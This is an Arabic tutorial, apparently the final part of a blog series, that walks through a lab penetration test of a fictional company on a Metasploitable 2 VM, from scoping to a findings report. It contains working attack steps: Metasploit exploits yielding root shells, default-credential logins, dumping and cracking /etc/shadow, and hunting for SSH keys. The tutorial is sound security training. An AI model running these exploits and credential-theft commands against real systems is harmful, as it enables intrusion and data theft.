مسار الهاكر: سلسلة من 5 أجزاء
الجزء الأول: المقدمة → الجزء الثاني: إتقان Flipper → الجزء الثالث: أساسيات Kali → الجزء الرابع: الاستغلال → الجزء الخامس: التدقيق الكامل
بدأت هذه السلسلة وأنت تتساءل ماذا يفعل الهاكرز فعلياً. تعلمت أن الأمر ليس عن الهوديات والنصوص الخضراء على الشاشة. إنه حل منهجي للمشكلات. لقد استنسخت بطاقات دخول، ورسمت خرائط للشبكات، والتقطت مصافحات، وحصلت على shells في أجهزة معرضة للخطر.
الآن نجمع كل شيء معاً. هذه المقالة ستأخذك عبر اختبار اختراق كامل ضد هدف وهمي. كل مرحلة، كل قرار، كل اكتشاف، موثق تماماً كما يفعل المحترف.
السيناريو
العميل: Initech Labs (شركة تقنية صغيرة وهمية)
النطاق: اختبار اختراق الشبكة الداخلية
الهدف: تحديد نقاط الضعف وإظهار التأثير المحتمل على الأعمال
هدفك: شبكة مختبرك الخاصة (Kali + Metasploitable 2 + أي أجهزة افتراضية أخرى أعددتها)
احضر قهوتك. ستكون ممتعة.
المرحلة الأولى: ما قبل المشاركة
قبل لمس لوحة المفاتيح، يتعامل مختبرو الاختراق المحترفون مع الجانب التجاري. تخطَّ هذا، ولن تكون مختبر اختراق. ستكون مجرد شخص يرتكب جرائم.
مكالمة تحديد النطاق
في مشاركة حقيقية، ستجري مكالمة مع العميل لفهم:
- ما الذي يدخل في النطاق؟ أي شبكات، نطاقات IP، تطبيقات؟
- ما الذي خارج النطاق؟ أنظمة الإنتاج؟ خدمات الطرف الثالث؟
- نافذة الاختبار؟ متى يمكنك الاختبار؟ ساعات العمل فقط؟
- جهات الاتصال؟ بمن تتصل إذا تعطل شيء ما؟
- الأهداف؟ علامة امتثال أم تحسين أمني حقيقي؟
لمختبرك
النطاق: شبكة مختبرك المعزولة فقط. خارج النطاق: كل شيء آخر على الأرض. نافذة الاختبار: متى شئت. الهدف: التعلم بالممارسة.
قواعد المشاركة
للمشاريع الحقيقية قواعد مكتوبة. إليك ما تغطيه عادةً:
- خطاب التفويض - وثيقة موقعة تثبت أن لديك إذناً
- إجراءات التصعيد - ماذا تفعل إذا وجدت شيئاً حرجاً
- التعامل مع البيانات - كيفية التعامل مع البيانات الحساسة التي تصادفها
- متطلبات التنظيف - إزالة جميع الأدوات والأبواب الخلفية عند الانتهاء
- الجدول الزمني للتقرير - متى يجب تسليم التقرير النهائي؟
احصل دائماً على إذن مكتوب
حتى للاختبارات "الودية" على شبكة صديقك. بريد إلكتروني موقع يقول "لديك إذن لاختبار شبكتي من تاريخ إلى تاريخ" قد يكون الفرق بين تجربة تعليمية وإدانة جنائية. خذ هذا الأمر بجدية.
المرحلة الثانية: الاستطلاع
حان الوقت لمعرفة كل شيء عن الهدف. في مشاركة حقيقية، سيشمل ذلك OSINT (استخبارات المصادر المفتوحة): بحث Google، ملفات LinkedIn، مواقع الشركات، سجلات DNS. لمختبرنا، ننتقل مباشرة إلى الاستطلاع النشط.
الخطوة الأولى: اكتشاف الشبكة
السؤال الأول: ماذا يوجد في هذه الشبكة؟
bash# اعثر على نطاق شبكتك
ip a | grep inet
# ابحث عن شيء مثل: inet 192.168.56.100/24
# اكتشف جميع المضيفين النشطين
sudo nmap -sn 192.168.56.0/24 -oA discovery
# النتائج (مثال):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).وثّق كل شيء. أنشئ ملاحظة تبدو هكذا:
text# Initech Labs - اكتشاف الشبكة
# التاريخ: 2026-03-08
# المختبِر: اسمك
192.168.56.1 - البوابة/الموجّه
192.168.56.101 - غير معروف (يتطلب التحقيق)
192.168.56.102 - غير معروف (يتطلب التحقيق)الخطوة الثانية: مسح المنافذ
الآن نتعمق أكثر. ما الخدمات التي تعمل؟
bash# مسح كامل للمنافذ مع اكتشاف الخدمات
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
# هذا يستغرق وقتاً. للحصول على نتائج أسرع أثناء التعلم:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101على Metasploitable 2، سترى كنزاً:
textPORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 3.X
3306/tcp open mysql MySQL 5.0.51a
5432/tcp open postgresql PostgreSQL DB
...يا للانكشاف. لنحدّث ملاحظاتنا:
text192.168.56.101 - خادم Linux (Metasploitable)
- FTP (21): vsftpd 2.3.4 # باب خلفي معروف!
- SSH (22): OpenSSH 4.7p1 # قديم جداً
- Telnet (23): نشط # لماذا هذا موجود في 2026؟
- HTTP (80): Apache 2.2.8 # تطبيقات ويب للاختبار
- SMB (139/445): Samba 3.X # منجم ذهب محتمل
- MySQL (3306): 5.0.51a # وصول لقاعدة البيانات؟
- PostgreSQL (5432): نشط # قاعدة بيانات أخرىالخطوة الثالثة: تحديد نقاط الضعف
حان الوقت لمعرفة ما يمكن استغلاله فعلاً.
bash# شغّل سكربتات الثغرات
sudo nmap --script vuln -oA vuln_scan 192.168.56.101
# تحقق من خدمات محددة في Metasploit
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2الباب الخلفي في vsftpd 2.3.4 يبرز فوراً. هذا shell مضمون. لكن مختبر الاختراق الجيد لا يتوقف عند أول اكتشاف. أنت توثق كل شيء.
المرحلة الثالثة: الاستغلال
هنا تصبح الأمور مثيرة. لدينا عدة نقاط دخول محتملة. لنعمل عليها بشكل منهجي.
متجه الهجوم الأول: الباب الخلفي لـ FTP
bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened
whoami
root
id
uid=0(root) gid=0(root)الاكتشاف موثق: تم الحصول على root shell عبر الباب الخلفي لـ FTP. الوقت من أول مسح حتى الاختراق الكامل: حوالي 10 دقائق.
لكننا لا نتوقف هنا. إلى أين يمكننا الدخول أيضاً؟
متجه الهجوم الثاني: Samba
bash# أرسل الجلسة الحالية للخلفية
background
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Command shell session 2 opened
whoami
rootroot shell أخرى عبر متجه مختلف. هذان مساران مستقلان للاختراق الكامل.
متجه الهجوم الثالث: تطبيقات الويب
لنتحقق مما يعمل على المنفذ 80.
bash# عدّد مجلدات الويب
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
# النتائج:
/cgi-bin/ (Status: 403)
/dav/ (Status: 301)
/icons/ (Status: 301)
/index (Status: 200)
/phpMyAdmin/ (Status: 301)
/phpinfo (Status: 200)
/test/ (Status: 301)
/twiki/ (Status: 301)
# شغّل nikto لمزيد من الاكتشافات
nikto -h http://192.168.56.101phpMyAdmin ببيانات اعتماد افتراضية؟ لنتحقق:
text# جرّب بيانات الاعتماد الشائعة
Username: root
Password: (فارغة)
# تم منح الوصول!وصول مسؤول قاعدة البيانات بدون كلمة مرور. من هنا، يمكننا تفريغ جميع البيانات، أو تعديل السجلات، أو استخدام عمليات الملفات في MySQL لكتابة web shell.
متجه الهجوم الرابع: بيانات اعتماد SSH الضعيفة
bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'بيانات الاعتماد الضعيفة تمنح وصول SSH. ليس root، لكننا سنتعامل مع ذلك في مرحلة ما بعد الاستغلال.
المرحلة الرابعة: ما بعد الاستغلال
لدينا وصول. ماذا الآن؟ اختبار الاختراق الحقيقي يُظهر التأثير على الأعمال. ماذا يمكن للمهاجم أن يفعل فعلاً بهذا الوصول؟
جمع بيانات الاعتماد
bash# من root shell الخاصة بنا
cat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::
# احفظها لكسرها دون اتصال
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt
# على Kali، اكسرها
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txtاستطلاع الشبكة (من الداخل)
bash# ما الشبكات الأخرى التي يمكن لهذا الجهاز الوصول إليها؟
ifconfig
route -n
cat /etc/hosts
arp -a
# ماذا يتصل بهذا الجهاز؟
netstat -tulpn
ss -tulpn
# ابحث عن مفاتيح SSH (للتحرك الجانبي)
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/nullاكتشاف البيانات الحساسة
bash# ابحث عن ملفات مثيرة للاهتمام
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
# تحقق من مواقع التكوين الشائعة
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf
# تعداد قواعد البيانات
mysql -u root -p # جرّب كلمة مرور فارغة
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;تصعيد الصلاحيات (من msfadmin)
تذكر تسجيل الدخول عبر SSH كـ msfadmin؟ لنصعّد إلى root باستخدام ما تعلمناه في الجزء الرابع.
bash# ادخل عبر SSH كـ msfadmin
ssh [email protected]
# تحقق من صلاحيات sudo
sudo -l
# (المخرجات تختلف، لكن لنتحقق من متجهات أخرى)
# ابحث عن ملفات SUID
find / -perm -4000 2>/dev/null
# ابحث عن سكربتات قابلة للكتابة يشغّلها root
cat /etc/crontab
# حمّل وشغّل LinPEAS للفحص الشامل
# (في السيناريو الحقيقي، تمت تغطيته في الجزء الرابع)المرحلة الخامسة: التوثيق والنتائج
الاختبار بلا فائدة بدون تقرير. هذا ما يفصل المحترفين عن المقلدين. تحتاج أن تشرح ماذا وجدت، ولماذا هو مهم، وكيف يُصلح.
ملخص النتائج
إليك ما وجدناه في شبكة "Initech Labs"، منسقاً كما سيظهر في تقرير حقيقي:
حرج: باب خلفي لخدمة FTP (CVE-2011-2523)
النظام المتأثر: 192.168.56.101
الخطر: تنفيذ كود عن بُعد بدون مصادقة بصلاحيات root
الدليل: تم الحصول على root shell كامل في أقل من 60 ثانية
التوصية: تحديث vsftpd فوراً إلى الإصدار الحالي أو تعطيل خدمة FTP بالكامل.
حرج: تنفيذ كود عن بُعد عبر Samba
النظام المتأثر: 192.168.56.101
الخطر: تنفيذ كود عن بُعد بدون مصادقة بصلاحيات root
الدليل: تم الحصول على root shell كامل عبر استغلال usermap_script
التوصية: تحديث Samba إلى الإصدار الحالي. تقييد وصول SMB للأنظمة الضرورية فقط.
عالي: وصول MySQL Root بدون كلمة مرور
النظام المتأثر: 192.168.56.101
الخطر: اختراق كامل لقاعدة البيانات، سرقة بيانات، نشر web shell
الدليل: تم تسجيل الدخول كـ root بكلمة مرور فارغة عبر phpMyAdmin
التوصية: تعيين كلمة مرور قوية لـ root. تقييد وصول phpMyAdmin. النظر في إزالة phpMyAdmin بالكامل.
عالي: بيانات اعتماد SSH ضعيفة
النظام المتأثر: 192.168.56.101
الخطر: وصول مصادق عليه يؤدي إلى تصعيد الصلاحيات
الدليل: msfadmin:msfadmin تمت المصادقة بنجاح
التوصية: فرض سياسة كلمات مرور قوية. تطبيق مصادقة مفتاح SSH. النظر في fail2ban.
متوسط: خدمة Telnet مُفعّلة
النظام المتأثر: 192.168.56.101
الخطر: بيانات الاعتماد تُنقل بنص واضح
الدليل: المنفذ 23 مفتوح ويقبل الاتصالات
التوصية: تعطيل Telnet. استخدام SSH لجميع الإدارة عن بُعد.
منخفض: صفحة phpinfo() مكشوفة
النظام المتأثر: 192.168.56.101
الخطر: كشف المعلومات يساعد في هجمات لاحقة
الدليل: http://192.168.56.101/phpinfo متاح بدون مصادقة
التوصية: إزالة أو تقييد الوصول إلى صفحات phpinfo.
الملخص التنفيذي
هذا ما يقرأه المديرون فعلاً. اجعله قصيراً ومؤثراً وبدون مصطلحات تقنية:
الملخص التنفيذي
خلال اختبار اختراق الشبكة الداخلية لـ Initech Labs، حقق فريق الأمن سيطرة إدارية كاملة على الخادم الرئيسي خلال 10 دقائق من بدء التقييم.
النتائج الرئيسية:
- ثغرتان حرجتان تسمحان بالسيطرة الفورية عن بُعد
- مشكلتان عاليتا الخطورة تكشفان قواعد البيانات وبيانات اعتماد المستخدمين
- اكتشافات متعددة متوسطة ومنخفضة تشير إلى فجوات أمنية منهجية
الخلاصة: مهاجم ذو مهارات أساسية يمكنه اختراق هذا النظام بالكامل في غضون دقائق. المعالجة الفورية مطلوبة لجميع النتائج الحرجة والعالية. يُوصى بتقييم متابعة بعد تطبيق الإصلاحات.
المرحلة السادسة: التنظيف والإغلاق
مختبر الاختراق المحترف يترك البيئة تماماً كما وجدها.
bash# وثّق جميع الجلسات
msf6 > sessions -l
# أنهِ جميع الجلسات
msf6 > sessions -K
# على الهدف (إذا أنشأت أي ملفات):
rm /tmp/linpeas.sh
rm /tmp/*.txt
# احذف أي مستخدمين أنشأتهم
userdel testuser
# احذف أي مفاتيح SSH أضفتها
rm /home/*/.ssh/authorized_keys
# وثّق كل ما حذفتهفي مشاركة حقيقية، ستفعل أيضاً:
- إزالة جميع الأدوات المرفوعة أثناء الاختبار
- توثيق أي تغييرات أُجريت على البيئة
- تقديم هاشات/checksums لأي بيانات استخرجتها
- حذف جميع بيانات العميل بأمان بعد تسليم التقرير
قائمة المنهجية الكاملة
إليك سير عملك القابل لإعادة الاستخدام لأي اختبار اختراق:
منهجية اختبار الاختراق
- ما قبل المشاركة
- تحديد النطاق وقواعد المشاركة
- الحصول على تفويض مكتوب
- إنشاء قنوات اتصال
- إعداد بيئة الاختبار
- الاستطلاع
- اكتشاف الشبكة (تعداد المضيفين)
- مسح المنافذ وتحديد الخدمات
- مسح الثغرات
- تعداد تطبيقات الويب
- توثيق كل شيء
- الاستغلال
- التحقق من الثغرات (لا تثق بالماسحات بشكل أعمى)
- استغلال الثغرات المؤكدة
- توثيق كل اختراق ناجح
- التقاط الأدلة (لقطات شاشة، سجلات)
- ما بعد الاستغلال
- تعداد النظام المخترق
- جمع بيانات الاعتماد
- تحديد البيانات الحساسة
- محاولة تصعيد الصلاحيات
- البحث عن فرص التحرك الجانبي
- التقرير
- كتابة ملخص تنفيذي (التأثير على الأعمال)
- توثيق جميع النتائج مع الأدلة
- تقديم توصيات المعالجة
- تضمين التفاصيل التقنية لفرق تقنية المعلومات
- التنظيف
- إزالة جميع الأدوات والآثار
- إنهاء جميع الجلسات والأبواب الخلفية
- توثيق أي تغييرات في البيئة
- التعامل مع بيانات العميل بأمان
ما التالي: طريقك للأمام
لقد أكملت مسار الهاكر. انتقلت من "ماذا يعني الاختراق حتى" إلى إجراء اختبار اختراق كامل. هذا مثير للإعجاب حقاً.
لكن هذه مجرد البداية. إليك أين تتجه بعد ذلك:
منصات التدريب
- Hack The Box - أجهزة واقعية للتدريب. ابدأ بالأجهزة المتقاعدة "السهلة".
- TryHackMe - مسارات تعلم موجهة. ممتازة للتقدم المنظم.
- VulnHub - أجهزة افتراضية مجانية معرضة للخطر للتحميل والتدريب محلياً.
- PentesterLab - التركيز على أمن تطبيقات الويب.
الشهادات (إذا أردتها)
- eJPT (eLearnSecurity Junior Penetration Tester) - نقطة بداية ممتازة، امتحان عملي
- OSCP (Offensive Security Certified Professional) - معيار الصناعة، صعب لكنه محترم
- PNPT (Practical Network Penetration Tester) - حديث، عملي، يشمل كتابة التقارير
- CEH (Certified Ethical Hacker) - علامة تأشير للوظائف المؤسسية، أقل عملية
التخصصات
- أمن تطبيقات الويب - OWASP، Burp Suite، حقن SQL، XSS
- Active Directory - معظم بيئات الشركات تعمل عليه
- الأمن السحابي - اختبار اختراق AWS، Azure، GCP
- أمن الهواتف - اختبار تطبيقات Android/iOS
- Red Teaming - محاكاة كاملة للخصم، مادية + رقمية
- الهندسة العكسية - تحليل البرامج الضارة، تطوير الاستغلالات
ابنِ مختبرك المنزلي
أفضل مختبري الاختراق لديهم مختبرات منزلية متطورة. ابدأ ببساطة وتوسّع:
- أضف Windows Server مع Active Directory
- أعدّ متحكم نطاق
- انشر تطبيقات ويب معرضة للخطر (DVWA، bWAPP، WebGoat)
- ابنِ شبكة بعدة أقسام
- أضف HoneyAegis لرؤية الهجمات من منظور المدافع
مسار الهاكر: مكتمل
لقد نجحت. جميع الأجزاء الخمسة، من الفضول إلى القدرة.
الجزء الأول: المقدمة الجزء الثاني: إتقان Flipper الجزء الثالث: أساسيات Kali الجزء الرابع: الاستغلال الجزء الخامس: التدقيق الكامل
السلسلة مكتملة - رحلتك
الجزء الأول: تعلمت ما هو الاختراق حقاً وحققت انتصاراتك الأولى مع Flipper Zero
الجزء الثاني: أتقنت كل بروتوكول في Flipper: Sub-GHz، RFID، NFC، BadUSB، GPIO
الجزء الثالث: بنيت مختبر Kali الخاص بك، تعلمت nmap، والتقطت مصافحات WiFi
الجزء الرابع: أتقنت Metasploit، الاستغلال، تصعيد الصلاحيات، والتمحور
الجزء الخامس: جمعت كل شيء في منهجية اختبار اختراق كاملة
الأمن ليس وجهة. إنه ممارسة. الأدوات ستتغير، والثغرات ستتطور، لكن المنهجية تبقى كما هي. شكّك في كل شيء. وثّق كل شيء. لا تتوقف أبداً عن التعلم.
مرحباً بك في الجانب الآخر.
- Lee